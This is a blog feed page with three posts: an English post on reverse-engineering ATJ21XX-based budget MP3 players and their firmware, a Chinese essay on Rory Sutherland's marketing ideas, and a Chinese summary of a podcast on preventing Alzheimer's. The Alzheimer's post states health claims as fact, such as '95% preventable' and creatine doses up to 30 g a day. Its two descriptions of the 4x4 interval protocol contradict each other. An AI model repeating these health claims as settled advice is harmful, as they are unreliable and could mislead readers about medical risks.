Infosec Press

Reader

Read the latest posts from Infosec Press.

from Tom Tildavaan

I would like to report on what we have learned during our research into ATJ21XX-SoCs.

Have you ever come across a device such as AGPTEK, WOLFANG, YOTON, or RUIZU? These devices seem to all be built by the same company. All of them support MP3/OGG/FLAC/AAC/APE formats, have the same menu structures, and sometimes even may be capable of playing videos or count your steps.

We have confirmed that RUIZU and AGPTEK are the same company. That's written right on the box, but many other players use the same chip, the ATJ2157 from Actions Semiconductor. These OEMs do not start with just the data sheet but instead use an SDK based on uC/OS-II.

It is unfortunate that some of these devices are built so cheap – low-speed memory, a poor FM tuner, and random glitches in the OEM operating system lead to devices with little polish, given that these chips are very powerful.

  • ATJ212X are MIPS-based and were found in your SanDisk Clip Sport and Jam devices as well as the RUIZU X02 (see Ruizu X02 Partial Disassembly and Notes). The data sheet calls the available SRAM “from ten to several hundred KB”.

  • ATJ215X are ARM Cortex M4F-based and are now used in almost all “budget” devices. CPU runs at 288MHz and has only 224KB RAM. This is less than the Raspberry Pi RP2040 with 256K.

These chips are all-in-one SoCs – lithium-ion battery protection, microphone input, USB 2.0 interface, SPI and SD interfaces, NOR/NAND flash controller, many GPIO pins, stereo headphone output for headphones, I²S up to 192kHz.

The SDK for the MIPS version was leaked – https://github.com/Suber/PD196_ATJ2127, and we can look into the wonders of UI built on an RTOS. Apart from data sheets and pinouts, we have found nothing for the ARM variant, which is unfortunate. We can buy chips on Alibaba, maybe then we can get SDK?

With such a rich set of supported media and so much versatility in a small package, an open SDK would allow users to address various software shortcomings with these devices (such as the strange fonts I mentioned earlier) or issues related to metadata processing where file names and order are incorrectly displayed.

So far, we have only been able to correct font types and adjust embedded string entries in the .STY files. While searching for information online, we found some repositories dealing with the device flashing process:

People from Rockbox have checked whether a custom operating system can be integrated into https://forums.rockbox.org/index.php?topic=51281.0, but 200K is simply too small.

We also found some people selling proprietary Actions Semiconductor firmware tools for ATJ2127 on a Chinese website that we do not want to include here, but you can find them.

Looking for ADFUS.BIN? PD196ATJ2127 has ADFUS.BIN inside case/fwpkg/US212ADEMO.fw sqlite3 database after you decrypt it with atjboottool for ATJ2127 and the ARM version of ADFUS.BIN is in all ATJ2157 firmwares you can download from RUIZU, AGPTEK etc.

SELECT writefile(FileName, File) FROM FileTable WHERE FileName = 'ADFUS.BIN';

Updates:

  1. Somebody got much further than us with arbitrary code execution – https://www.reddit.com/r/hacking/comments/1hss4k3/i_finally_got_arbitrary_code_running_on_ruizu_x02/ and patched AP – https://gitlab.com/reverse2682701/ruizu-x02-rev
  2. A post showing how to flash SanDisk Sport using reverse-engineered Actions Media Tool scripts from the repo we linked earlier – https://gist.github.com/roman-yepishev/737dfda3a0a853fe730286d3ce49fccd. The author links to a reverse-engineered ADFUS.BIN but you don't have to do that – take PD196_ATJ2127 version.
 
Read more...

from Team Taiwan

台灣把全球最複雜的東西做出來,卻沒有一個消費品牌讓世人記得。

當你拿出一瓶好酒,你傳遞的訊息是:「我把你的生日當回事。」如果那瓶酒是 8.95 美元的,這個信號就消失了。

Content


AI 時代來了,但人不是機器

有人說,未來你只要對 AI 說「幫我找個滑雪假期」,它就會給你一個完美答案。

Rory Sutherland 聽到這句話,忍不住搖頭。

「人們不是那樣做決定的。」

Sutherland 是奧美集團(Ogilvy)的副主席,在廣告與行銷業浸淫超過 36 年。他同時是 TED 演講者、行為科學的公共倡議者,長期在商業與心理學的交界地帶觀察人類如何真正做出選擇。

在這場與 Farnam Street 的 Shane Parrish 的深度對話裡,他從 AI 的局限談到奢侈品的邏輯,從郵差的微笑談到文案的本質,拆解了一件商業世界最常忽視的事:人類的決策,從來不是純理性的計算,而是充滿心理感知、社會信號與情感脈絡的複雜工程。

回到目錄


台灣為什麼一直困在供應鏈裡

讀到這裡,台灣人(指得是我)可能會有一種熟悉的刺痛感。

台灣的製造業舉世聞名。半導體、電子代工、精密零組件,我們把全球最複雜的東西做出來,做得又快又好又便宜。台積電的晶圓良率,全球沒有第二家能比。

但我們的品牌呢?屬於台灣的品牌呢?

走進紐約的百貨公司,你不會看到台灣品牌。走進東京的電器行,你不會看到台灣品牌。走進倫敦的超市,你也不會看到台灣品牌。你看到的,是韓國的三星、日本的 Sony、美國的 Apple —它們的晶片和零件,是台灣製造的,但是品牌上寫得卻不是台灣。

台灣長期站在產業鏈的上中游:我們是供應端,是生產端,不是終端。我們把東西賣給品牌商,不是賣給消費者。我們的名字印在 BOM 表裡,不是印在包裝盒外面。

這不只是策略選擇的問題,更深層的原因在於:台灣對「人」的理解,嚴重不足。

Sutherland 在訪談裡說的那些事 ——顧客買的是信任感,不是規格;品牌的本質是情感的信號;決策不是理性計算 —這些對台灣的工程師文化來說,幾乎是陌生語言。我們習慣用良率、製程節點、交貨期來衡量價值,卻不習慣問:終端消費者感受到什麼?他買這個東西的時候,心裡在想什麼?

製造業的邏輯是:把規格做到最好,買家自然會來。但品牌的邏輯完全不同:你必須進入消費者的情感世界,讓他們在掏錢的那一刻,就是對在世人宣告「我是誰」,是自我形象的呈現。

這件事,學校不教,工廠不練,老闆不問。

所以我們一直很擅長製造別人設計的東西,卻很少有機會去理解,那個東西最後被誰買走、為什麼買、買完之後心裡有什麼感覺。

產業鏈的位置,某種程度上是能力邊界的投影。我們停在上中游,不完全是因為我們不想做品牌,而是因為我們缺少一種長期被忽視的能力 ——讀懂人心的能力

Sutherland 這場訪談,某種意義上,是一堂台灣產業從來沒有認真上過的課。

回到目錄


決策不是計算,是感知

Sutherland 對 AI 行程規劃的批評,其實指向一個更根本的問題:我們對「決策」的理解,太過工程化了。

「至少,你必須給人們看三到五個選項讓他們比較。因為在沒有對比的情況下,我們無法真正做出選擇。」

這不是人類的缺陷,而是人類認知的本質。自由市場資本主義有一個奇特的前提:我們只有在相對於其他選項選擇了某樣東西之後,才能確認自己是否真的喜歡它。

旅行社之所以存在,正是因為它提供的不只是資訊,而是比較的框架。Google 的「好手氣」按鈕掛在首頁幾十年,幾乎沒有人按。原因很簡單 —人們想要在選項中選擇,不想被直接帶走。

誘餌效應的現實應用

這裡有一個真實的例子。

房地產經紀人之間有個心照不宣的小技巧:在帶客人看你真正想賣的房子之前,先讓他們看一間略貴、略不合適的。這樣當他們看到目標屋時,比較的基準已經建立了,決策自然浮現。

「因為他們可以說,這間比另一間便宜一點,而且還有個陽光房。有了對比。」

這是行為經濟學裡著名的「誘餌效應」,但它每天都在你不注意的地方發生。

回到目錄


效率的誘惑與陷阱

如果說有一件事讓 Sutherland 真正感到焦慮,那就是「對效率的盲目崇拜」。

「我們通常都在錯誤的地方追求效率。」

當一個企業開始追求效率,它通常會開始量化所有可以量化的東西——成本、流程、人力——然後削減。這聽起來合理,但問題在於:最有價值的事物,往往是最難量化的。

「你過度專注於成本削減,卻太少關注價值創造。」

技術界尤其容易犯這個錯。當你把業務流程定義得足夠清晰,讓它「容易被自動化」,你同時也在消滅那些附著在這個流程上、從來沒有被明確定義過的隱性價值。

回到目錄


門僮謬誤:看不見的價值

Sutherland 最喜歡用的例子,他稱之為「門僮謬誤」。

想像一家五星級飯店,有一位站在門口迎接客人的門僮。

某天,麥肯錫的顧問進來了。他們分析、計算,然後得出結論:「這位門僮的功能是『開門』。我們可以用紅外線感應自動開門器取代他,每年幫你省下三、四萬美元。」

他們帶走了成本節約的功勞,瀟灑地轉身離開。

兩年後,飯店的房價開始下滑,評分一路走低。原因是什麼?

「門僮做的是多重任務,其中許多是人性化的、隱性的。」

安全感 —門口不會有流浪漢睡在那裡。叫計程車、處理行李、認出老客人。讓飯店顯得有地位。那個門僮承擔著幾十種不在「開門」定義裡的工作。

這是成本非常明顯、但效益完全隱形的典型案例。

Sutherland 補充了一個更直白的觀點:「最偉大的效率形式之一,是僱用一個真的非常友善的人。」

在某些組織裡,最好的客服人員應該拿六位數薪水——因為他們對顧客感知的影響,遠超過任何廣告或產品升級。

回到目錄


郵差理論:品牌是一張臉

有一個故事,完美說明了人類對「系統」的評價,其實是通過「人」來完成的。

英國皇家郵政(Royal Mail)曾長期困惑於一個數據矛盾:有些地區的投遞準時率極高,品牌評分卻平平;有些地區的服務表現普通,顧客卻特別喜歡皇家郵政。

後來有人提出一個理論,並獲得驗證:一個地區對皇家郵政的好感度,主要取決於那個人喜不喜歡他的郵差。

那些服務不太可靠、但郵差偶爾幫忙把包裹放在門廊、跟顧客閒聊兩句的地區,顧客的品牌印象反而更好。

「這在任何服務組織中都是如此。」

Sutherland 把這個觀察延伸到所有企業:你 95% 的時間可能是透過 App 或網站與一家公司互動,但那一兩次電話或面對面的接觸,對你對這個品牌的整體印象,有著不成比例的影響。

「因此,如果把行銷預算的 10% 到 20% 拿去升級客服中心,有時候會比花同樣的錢做廣告更有效。」

為什麼「面對面」的重量這麼大

Sutherland 給出了一個演化的解釋。

「我們沒有多少評估郵政效率的演化經驗。但我們有一百萬年的經驗,去判斷我們面前的這個人,值不值得信任。」

在人類演化的絕大多數時間裡,「我信任這個人嗎?他是盟友還是敵人?」是最重要的問題之一。所以我們的大腦發展出了極其精細的人際判斷能力,並且在評估任何組織時,不自覺地以「人」作為代理指標。

這解釋了為什麼一個笑容,有時比一個 SLA 保證更有說服力。

回到目錄


顧客買的不是規格,是信任

Sutherland 講了一個買二手車的思想實驗,把這個邏輯說得更清楚。

你看中了一輛二手車,打算出五千美元。你四處查看了車況。然後你去按門鈴。

情境一:開門的是一位衣著整潔的女牧師,教會的人。

情境二:開門的是一個穿著內褲、隨性不拘的男人。

「在第一種情況下,你可能會把願意支付的價格提高 20%。在第二種情況下,你可能會把車的價值降低一千美元,甚至根本不買。」

車況沒有改變。但你對賣家的感知,徹底改變了你對「這筆交易是否值得信賴」的評估。

這不是非理性。這是人類在沒有足夠技術知識時,使用「人際信任」作為替代判斷的本能。

「我母親對車一無所知,但對人很了解。我認為她可能僅僅通過評估賣家,就能非常可靠地四處買車。」

房地產的隱藏邏輯

Sutherland 還提到,有經驗的房地產經紀人,通常會盡力阻止買賣雙方在交易完成前相見。

原因是:如果任何一方對另一方有負面感知,不管房子多好、價格多合理,交易可能就此告吹。

「我曾經因為賣家對冰箱的態度很差,就放棄買那棟房子。那台冰箱只值房子價值的 0.02%。但因為他那個態度,我不再信任他關於房子的任何說法。」

後來他的朋友去買同一棟房子,做了土地登記查詢,才發現花園有一大塊實際上屬於鐵路公司。他當初的直覺,是對的。

回到目錄


售價即信號:奢侈品的邏輯

談完了信任,Sutherland 把視角轉向一個看似截然不同、但其實邏輯一脈相承的話題:為什麼有些東西必須很貴?

「在氣泡酒或香檳生意中,酒多好喝並不重要 —如果人們覺得你只花了 8.95 美元買它,它就無法發揮應有的作用。」

這不是非理性消費,而是一種理性的信號機制。

當你拿出一瓶好酒,你傳遞的訊息是:「我把你的生日當回事。」如果那瓶酒是 8.95 美元的,這個信號就消失了。

售價本身,就是信號的載體。

Sutherland 引用了行為經濟學家 Richard Thaler 的「交易效用」概念 —我們對一個購買的感受,不只取決於商品本身的使用效用,也取決於「這筆交易發生的脈絡是否符合預期」。

「在一家精品酒店買到的冰啤酒,和在一個小攤販買到的冰啤酒,即使是同一罐,人們願意支付的價格是不同的。」

「因為我值得」:向自己發出的信號

更有趣的一層,是消費中的「自我信號」。

萊雅(L'Oreal)的廣告標語是「因為我值得」。Sutherland 認為這句話裡藏著一個深刻的真相:很多時候,我們購買某些東西,不只是在向外界展示,更是在向自己確認一件事:

我是那種配得上這東西的人

「這能提供一種自尊心的提升、一種安全感,或某種我需要的心理需求。」

當你理解了這一點,很多看似不理性的消費行為,就有了清晰的邏輯。包包之所以昂貴,手錶之所以被代代相傳,不只是物質的功能,而是「意義的儲藏庫」。

回到目錄


好文案的本質

對話的後半段,Sutherland 被問到一個很實際的問題:好文案的規則是什麼?

他沒有給出一個標準公式,而是說了一句很誠實的話:

「文案是一種『默會知識』(tacit knowledge)。我們知道的,往往比我們能說出的更多。」

但他還是給出了幾個可以操作的原則:

寫作要像在聊天,比你以為「應該寫的方式」更口語化。用動詞優於形容詞,用形容詞優於副詞。要把「規格(feature)」轉化為「利益(benefit)」。

他同時提到,最好的文案有時只需要告訴人們一個事實。

「行銷並不總是關於說服,或驅使人們行動 —有時候,只是讓人們進入一種知曉與確信的狀態,相信這件事能改變他們的生活。」

創新需要更多行銷,不是更少

最後,Sutherland 點出了一個反直覺的洞察:

「巨大的創新點子並不需要更少的行銷,反而需要更多。」

因為當你在推廣一個真正全新的東西,你是在要求人們做兩件都會引發不安的事:做一件「他們自己以前沒做過的事」,以及做一件「沒有人做過的事」。

人類的預設模式是「重複過去」和「跟隨大眾」——這是演化邏輯,不是愚蠢。所以在早期階段,「提供信念和保證」是行銷最核心的任務,而不是理性地羅列功能。

那些工程背景的創辦人最容易犯的錯,就是相信「我們的產品太棒了,它會自我推銷」。它不會。至少,不會在大部分人的認知還停在「這是什麼」的時候。

回到目錄


成功的定義:把石頭往前推一點

訪談的最後,Shane Parrish 問了那個每次都出現、但每次答案都不同的問題:對你來說,成功是什麼?

Sutherland 的回答,在這場充滿理論與洞察的對話裡,顯得意外地樸素:

「成功就是擴展『鄰近的可能』(adjacent possible)。就是把小石頭再往前推那麼一點點。」

他說,他之所以常常做公開演講、散播這些想法,是因為偶爾會有人跑來告訴他:「因為你說的話,我做了一個不同的決定。」

有人對他說:「因為你,我買了那間房子。」

這就夠了。

不是改變整個行業,不是讓所有人都懂行為科學,不是讓所有廣告都從此以人的心理為核心。只是讓某個人,在某個時刻,用了一個更貼近現實的角度思考問題,做了一個對他們更好的決定。

對一個在這個行業工作了 36 年的人來說,這件事的重量,不亞於任何獎項。


本文整理我的感想,以及 Rory Sutherland 與 Farnam Street(Shane Parrish)的 Podcast 訪談《How to Think Like a World-Class Marketer》。Rory Sutherland 目前擔任奧美集團副主席,著有《Alchemy: The Dark Art and Curious Science of Creating Magic in Brands, Business, and Life》。

回到頁首


願台灣的未來,能有屬於我們的終端消費品牌。


 
Read more...

from Team Taiwan

6,000萬阿茲海默病患,七成是女性。


目錄


引言:那個說「我不知道我是誰了」的女人

1901 年,一個 52 歲的女人被丈夫帶去精神科。

她說不出東西的名字。她找不到剛才放下的鑰匙。她告訴接待她的醫師:

「我不知道我是誰了。」

她叫 Augusta DT。接待她的醫師叫 Alois Alzheimer。五年後她死去,醫師切開她的大腦,發現裡面佈滿了異常的斑塊。那是第一個被記錄在案的阿茲海默症病例。

一百二十年過去了。

那些斑塊還在。那種失去自我的感覺還在。而全球罹患這個疾病的人,已經達到六千萬。

神經科學家 Louisa Nicola 在 Stephen Bartlett 的訪談裡說了一句話,讓全場安靜了幾秒:

「我們有一位病人,她照著鏡子問:那個人是誰?」

「 兩年前她還認識我。現在她問我:你是我女兒嗎?」

這篇文章整理自那場訪談。Louisa Nicola 是臨床醫師,也是學術研究員,過去十年在神經外科環境中研究大腦,博士論文聚焦於女性與阿茲海默症。她的外祖母與這個病無關,但同樣因為沉默、因為沒有及時求助、因為把自己排在最後,在確診兩個月後就離開了人世。

Louisa 說,那是她決定一輩子研究這個的時刻。

回到目錄


六千萬人,七成是女性

先講一組數字。

全球目前有六千萬人罹患阿茲海默症。這個數字在 2050 年會變成三倍。屆時,光是女性患者就會達到一億一千萬人。

70% 的患者是女性。這件事很長一段時間被解釋為「因為女性壽命比較長」,但 Louisa 說,我們現在有足夠的證據推翻這個說法。

「失智症和阿茲海默症,不是正常老化的一部分。對女性來說,成為女性這件事本身,就是一個風險因子。」

更讓人難以消化的是這一句:

目前已知的阿茲海默症病例,95% 理論上可以預防。

不是 50%。不是 70%。是九十五。

因為這不是一個遺傳疾病,這是一個生活型態疾病。真正由基因突變直接決定的,只有約 3%。其餘的,都和你每天怎麼過日子有關。

Louisa 在訪談裡說,這正是她最憤怒的地方:「這麼多人正在被一個可以預防的疾病奪走一切,而他們根本不知道。」

回到目錄


大腦不是永遠的:病程如何從 30 歲悄悄開始

很多人以為阿茲海默症是老年才需要擔心的事。

不是。

大腦在 25 到 30 歲左右完成發育。從那之後,如果你不主動照顧它,退化就開始了。阿茲海默症的病程,通常從 30 多歲啟動,症狀要到 60、70 歲以後才顯現。

這意味著你在 65 歲被確診的那一天,大腦已經在你不知情的狀況下被侵蝕了三十年。

這個病有兩個標誌性的病理特徵。一個叫類澱粉蛋白(amyloid beta),一個叫濤蛋白(tau protein)。

類澱粉蛋白本來是保護大腦的。它是一種抗菌蛋白,負責防禦。問題不在它的存在,而在它無法被清除。

大腦有一套清洗系統,叫做淋巴系統(glymphatic system)。這個系統只在深度睡眠的時候啟動。當你進入深眠,膠質細胞會收縮,腦脊髓液趁機沖走積累的廢物,包括多餘的類澱粉蛋白。

但如果你睡不好——不管是因為壓力、熱潮紅、輪班工作、還是只是習慣性地睡六小時——這個清洗就無法完成。

一個晚上的睡眠不足,大腦中的類澱粉蛋白風險就上升 4 到 5%。

就一個晚上。

濤蛋白的故事更複雜。它存在於神經元的軸突中,負責穩定讓神經訊號傳遞的微管結構。當你長期處於壓力、發炎、或雌激素不足的狀態,濤蛋白會磷酸化、糾結、最終讓整條軸突塌陷。

大腦同時在細胞內和細胞外受到攻擊。這就是阿茲海默症的本質。

而這一切,在你有任何自覺症狀之前,已經在進行了幾十年。

回到目錄


一個晚上的睡眠,讓你的大腦老四年

Louisa 說,睡眠是目前被最嚴重低估的阿茲海默症預防工具。

「我們覺得睡覺是理所當然的事,就是去睡,魔法自然發生。但在 2026 年,我們需要認真訓練自己的睡眠。」

她自己的目標是每晚 7.5 小時。

有人告訴她,他已經習慣睡五個小時了,感覺沒什麼問題。她的回答很直接:

「他們會在 60、70 歲為此付出代價。」

睡眠債不能靠週末補還。這不像銀行存款,多存幾天就能提領。睡眠剝奪的複利效果是單向的,它一直在累積,但無法清零。

你可以在長途飛行前的一週刻意多睡,為接下來的剝奪做一點準備性的儲備。但你沒辦法把過去十年每晚只睡六小時的損失補回來。

影響睡眠品質的因素有很多。壓力、咖啡因的攝取時機、螢幕帶來的藍光、體溫調節、荷爾蒙——這些全部都在影響你能否進入深眠,也就是大腦清洗機制能否啟動。

如果你的問題是睡不著,要排查的是你睡前做了什麼。如果你的問題是睡著了但容易醒,要排查的是皮質醇、血糖穩定度、和睡眠環境的溫度。

回到目錄


VO2 Max:可能是預測你壽命最準的單一指標

你可能聽過很多關於長壽的指標。血壓、血糖、膽固醇、肌肉量。

Louisa 說,目前科學文獻中,全因死亡率最強的單一預測因子是 VO2 Max——你的最大攝氧量。簡單說,就是你的心肺系統在高強度狀態下利用氧氣的能力。

這個數字從大約 35 歲開始每年下滑。如果放任不管,心臟會逐漸硬化,左心室壁增厚,泵血能力衰退,動脈彈性消失。

運動心臟科醫師 Ben Levine 做了一項讓 Louisa 完全改變想法的研究。

他找來一群平均年齡約 50 歲的久坐男性,讓他們進行結構化的運動訓練,每週四小時,持續兩年。

兩年後,他掃描這些人的心臟。

結果是:心臟年齡逆轉了二十年。一顆 50 歲的心臟,被改造成了 30 歲的心臟。

但這有一個截止點。Levine 發現,65 歲之後,心臟僵化的程度已經無法被逆轉。如果這個干預在 65 歲以後才開始,效果就消失了。

中年,是行動的最後窗口。

要提升 VO2 Max,最有效的方法是「挪威 4×4」訓練法:把心率拉到最大值的 90 到 95%,維持四分鐘,完全休息四分鐘,重複四輪。每週只需要一次,就能達到 Levine 研究中的效果。Louisa 本人每週做兩次,在踏步機上以高阻力進行。

這不是一個舒服的訓練。這是一個會讓你無法說話的訓練。

但那四分鐘,可能是你整週最值得的四分鐘。

回到目錄


最佳運動策略:你的大腦需要的不只是跑步

Louisa 在運動這件事上的立場很清楚:你需要的不是更多運動,而是更對的運動。

重量訓練排第一,而且必須夠重。

研究文獻顯示,要觸發大腦層面的神經效益,你需要達到個人最大反覆重量的 80%。輕重量高次數對增肌有效,但對大腦的效果遠不及重負荷訓練。

為什麼?因為肌肉用力收縮時,會釋放一種叫「肌肉激素」(myokines)的訊號分子。其中一種叫做 irisin,它會穿越血腦屏障,告訴腦源性神經滋養因子(BDNF)去生長——而 BDNF 是大腦的生長因子,負責在海馬迴中長出新的神經元。

海馬迴是什麼?是大腦的記憶中心。也是阿茲海默症最先侵蝕的地方。

另一種肌肉激素 interleukin-6 (介白素6),在運動情境下反而具有強力消炎效果,並且能抑制腫瘤細胞生長。製藥公司花了幾十億試圖把這些肌肉激素裝進藥瓶裡,目前全部失敗。

如果你一生只能選一個動作,Louisa 說,選硬舉。它能動員幾乎全身的肌肉群,給大腦的神經驅動也最大。腿部力量尤其關鍵。一項以雙胞胎為對象的研究顯示,腿力較強的那一方,大腦灰質體積更大,認知測試表現也顯著較優。

有氧運動這邊,高強度的 Zone 5 優先於 Zone 2。

Zone 2(約 60% 最大心率,可以說話但有些費力)有益,但它無法全面重塑心臟的四個腔室。Zone 5 可以。而且對女性來說,Zone 2 的投資報酬率明顯低於男性。

Louisa 的建議優先順序:先建立每週 2 到 3 次的重量訓練,加上至少每週一次的 Zone 5 高強度間歇。如果還有時間,再加入 Zone 2 長跑或有氧活動。

最後一件事:即使你每週都有在運動,如果你每天坐超過十小時,心血管疾病的風險依然會獨立地上升。

原因是一種叫做脂蛋白脂肪酶的酶,它負責燃燒脂肪和清除血液中的葡萄糖——而長時間靜止會直接關閉這個酶的運作,不管你昨天有沒有上健身房。

解法很簡單:每小時起來做十個徒手深蹲。研究顯示,這樣就足以抵消久坐的危害。

回到目錄


確診之後,你還能做什麼

Stephen Bartlett 問了一個讓 Louisa 停頓了一下的問題:

「如果你自己被確診了,你會怎麼做?」

她說了幾秒之後,開始回答。

「我會積極地、非常積極地運動。我會徹底監控我的飲食。我會考慮採用生酮飲食。我會大幅提高 Omega-3 的攝取。我會積極管理血脂。只要我的認知功能還允許,我就持續和人對話、出去走動、做困難的事、把網球打向牆壁。」

她強調一個讓人很難受的現實:

阿茲海默症一旦確診,沒有任何方法能逆轉。沒有藥,沒有手術,沒有奇蹟。

你可以在輕度認知障礙(MCI)階段——也就是確診前的前期——減緩進程。但一旦跨過那條線,剩下能做的,只有盡量延緩惡化的速度。

這個病通常也不會直接「殺死」你。它讓大腦逐漸喪失指令能力:你可能忘記如何吞嚥,因此窒息;你可能失去平衡感,因此跌倒;你的免疫系統全面崩潰。病人通常死於這些繼發性的問題,而不是阿茲海默症這個診斷本身。

這也是為什麼 Louisa 說,在輕度認知障礙這個階段,你還有牌可以打。任何能讓功能多保留一年的干預,都值得全力投入。

回到目錄


女性的特殊風險:更年期是一場大腦能源危機

這是整場訪談中最令人震驚的部分之一。

女性進入更年期後,大腦的葡萄糖代謝效率下降 30%。

不是 5%,不是 10%。是30%。

大腦需要大量能量運作 — 它消耗你每天攝取總熱量的 20%。它的首選燃料是葡萄糖。而雌激素受體廣泛分佈在大腦各處,包括海馬體和記憶中心。當雌激素在更年期期間大幅下滑,這些受體失去功能,大腦使用葡萄糖的能力就開始退化。

大腦感受到能量危機,開始自救。

星狀膠質細胞(astrocytes)—大腦的支援細胞— 會開始分解髓鞘,從中提取酮體作為替代燃料。這是一個生存機制,但代價是髓鞘本身正在被消耗。

這解釋了為什麼 60 到 65% 的更年期女性會出現腦霧、記憶變差、注意力下降。這不是心理問題,這是大腦燃料供給失常的直接結果。

加上更年期的熱潮紅和夜間盜汗,大量女性無法進入深眠 — 清洗大腦廢物的窗口就此關閉,類澱粉蛋白開始積累。

Louisa 直接點明:「女性成為阿茲海默症最大受害者的原因,在很大程度上發生在更年期那個十年裡。」

這段時間,大腦特別需要酮體。而酮體,大腦其實比葡萄糖更善於利用,效率更高。

回到目錄


前扣帶迴皮質:你的意志力真的可以被訓練大

你有沒有想過,為什麼有些人對自己說「我要去運動」,然後真的去了,而另一些人說了十年,每次還是在沙發上看完一季影集?

這不只是性格問題。這是神經生物學問題。

大腦中有一個叫做前扣帶迴皮質(anterior mid-cingulate cortex,AMCC)的區域。Andrew Huberman 稱它是「近一百年最重要的神經科學發現之一」。

這個區域專門在你做你不想做的事情時啟動。

每當你強迫自己做一件困難的、你想逃避的事,AMCC就會生長。每當你放棄、選擇安逸,它就萎縮。

關鍵在於「挑戰性」本身,而不是你在做什麼。如果你本來就喜歡冰浴,每天泡一次,AMCC 不會有任何改變。但如果你討厭冰浴,每次都要強迫自己進去,AMCC 就會實際增大。

超齡老人(super-agers)—那些在 80、90 歲依然認知功能清晰的人— 普遍擁有更大的 AMCC。運動員的 AMCC 體積顯著大於一般人。而長期久坐、習慣性迴避挑戰的人,AMCC 會字面意義上地萎縮。

這個腦區的大小,甚至能預測一個人在重大健康危機後的存活率。研究者現在把 AMCC 稱為「求生意志的所在地」。

Louisa 說,這就是為什麼大多數新年目標在二月就消亡了。不是因為意志力薄弱,而是因為這些人的 AMCC 太長時間沒有被訓練,根本還沒有足夠的神經基礎去支撐改變。

「意志力不是性格,它是神經生物學。你可以訓練它,就像訓練肌肉一樣。」

Theodore Roosevelt 在 28 歲那年,同一天失去了母親和妻子。他離開紐約,獨自去北美的荒地待了兩年,每天凌晨四點起床,在嚴寒中騎馬,直到馬站著凍死。兩年後他回來,所有朋友都說他變成了一個完全不同的人。

現在我們知道,他不只是鍛鍊了身體,他是真的重塑了自己的大腦。

回到目錄


AI 時代的大腦腐爛

Louisa 的碩士主修數學。她說,那時候她能徒手做三角函數和微積分,腦子轉得很快。

現在她必須用 ChatGPT 計算 20% 的小費。

「我有時候會想,我到底變蠢了多少?」

她認為 AI 是一個光譜問題 — 它確實有巨大的價值,但它正在悄悄接管我們本來應該自己完成的認知工作。而每當我們外包一個思考任務,那個對應的神經網路就少了一次被激活的機會。

2024 年,牛津字典把「brain rot」(大腦腐爛)選為年度詞彙。這不是偶然。

人們停止閱讀長篇文章。人們無法維持長時間的專注。人們愈來愈難以進行需要深度推理的對話。

加上社群媒體的滑動機制,每一次滑動都是一個微小的多巴胺刺激,讓大腦學會依賴即時的小獎勵,逐漸失去等待深度滿足的能力。

大腦是一個「用進廢退」的系統。

你不用它做困難的事,它就不替你保留那個能力。

回到目錄


行動建議整理:給所有人

以下整理自訪談中 Louisa Nicola 提出的所有具體建議,適用於任何年齡與性別。

運動

每週至少 2 到 3 次重量訓練,且重量需達到個人最大反覆重量的 80% 才能觸發大腦層面的效益。首選動作為硬舉或深蹲等複合式動作。

(click for details) 每週至少一次「挪威 4×4」高強度間歇訓練:心率拉到最大值的 90 至 95%,維持四分鐘,完全休息四分鐘,重複四輪。可在跑步機、踏步機、或單車上進行。

這套訓練法由挪威心血管研究學者 Ulrik Wisløff 提出,後來被耐力運動員廣泛採用。完整流程是:先以輕鬆強度熱身 10 分鐘,接著進入主體 —以最大心率的 85 至 95% 高強度運動四分鐘,然後用慢走或輕鬆慢跑恢復三分鐘,重複四輪,最後緩和五到十分鐘收操。整個課表大約 40 至 45 分鐘。可以在跑步機、踏步機、室外坡道、或單車上進行,只要能把心率推到那個區間就行。研究顯示,持續六到八週、每週兩到三次,VO2 Max 可提升約 7 至 13%,同時心搏量增加、靜息心率下降、肌肉粒線體密度提升。強度判斷的簡單原則:你應該非常費力,但還能勉強維持配速 —不是衝到動彈不得,而是每組結束後你清楚地知道自己還能再撐一組。

每週一次中強度有氧訓練,如健行、騎車、網球,持續約 60 分鐘,達到能說話但仍費力的程度。

每小時起身做 10 個徒手深蹲,打破久坐對代謝的抑制。

睡眠

目標每晚 7.5 小時。認真對待睡前的降溫程序:調暗燈光、避免藍光、保持臥室涼爽。補充鎂有助放鬆神經系統。

判斷問題的關鍵問題:你是睡不著,還是容易醒?兩者的根因不同,解法也不同。

補充品

肌酸(Creatine):為最被低估的大腦保健補充品。建議每日劑量為 10 至 20 公克,分多次服用,肌肉飽和後大腦才有機會吸收到足量。選購時尋找 CreaPure 認證(德國製造)且通過 NSF 認證的品牌,質地應帶顆粒感。腎臟指標擔憂者,請醫師檢測 Cystatin C,而非傳統的 creatinine。(click for details)

基本介紹
肌酸是人體自然產生的分子,每天自行合成約 2 至 3 公克,主要由肝臟分泌,少部分來自大腦。2 至 3 公克已經足夠,但不夠多。

為什麼需要補充超過 5 公克
過去幾十年大家補充每天 5 公克,這個量主要只是在飽和肌肉。肌肉非常飢渴,會優先搶走所有肌酸,大腦幾乎分不到。加上肌酸穿越血腦屏障時會損失一部分生物利用率,所以要讓大腦真正受益,必須補充超過 5 公克。

阿茲海默症患者的先導研究
這是改變 Louisa 想法的關鍵研究,也是第一個針對阿茲海默症患者的先導試驗。患者每天補充 20 公克肌酸,結果不只保留了認知功能,還有更多精力,並且能夠做更多運動。她特別強調這個結果讓她震驚,因為不管年齡、性別、體重、病理狀態或族裔,肌酸都有效。

睡眠剝奪
每天補充 15 至 20 公克的高劑量肌酸,可以逆轉睡眠不足(4 至 6 小時)造成的認知負面影響。

腦部保護
每天約 30 公克的高劑量可以保護大腦免於腦震盪、中風和壓力的傷害。她特別提到這對美式足球員等高接觸性運動員非常重要。

抗癌效果
她提到一項 2025 年的 NANDS 研究,涵蓋超過 25,000 名成年人,發現飲食中肌酸攝取量每增加一個標準差,癌症風險降低約 5 至 18%,50 歲以上族群保護效果最強。劑量約為每公斤體重 0.36 公克(70 公斤的人約 25 公克)。

更年期女性
一項小型隨機對照試驗,將更年期前後女性分為低劑量(750 毫克)、中劑量(1.5 公克)、不同型態混合,以及安慰劑組。中劑量組在情緒和認知功能上有顯著改善。她說肌酸現在正在被研究用於女性整個生命週期,包括懷孕、更年期前後和失智症。

腎臟疑慮
很多人因為醫師說 creatinine 偏高而停用肌酸。Louisa 說這是常見的誤解,creatinine 本來就會在高肌肉量、高強度運動或補充肌酸後上升,不是腎臟受損的可靠指標。真正應該檢測的是 Cystatin C,請醫師加入血液檢查項目,如果這個數值正常就沒有理由停用肌酸。

掉髮疑慮
她提到這也是很多人的顧慮,但訪談中沒有展開詳細說明,只是把它列為要解除的兩個常見恐懼之一。

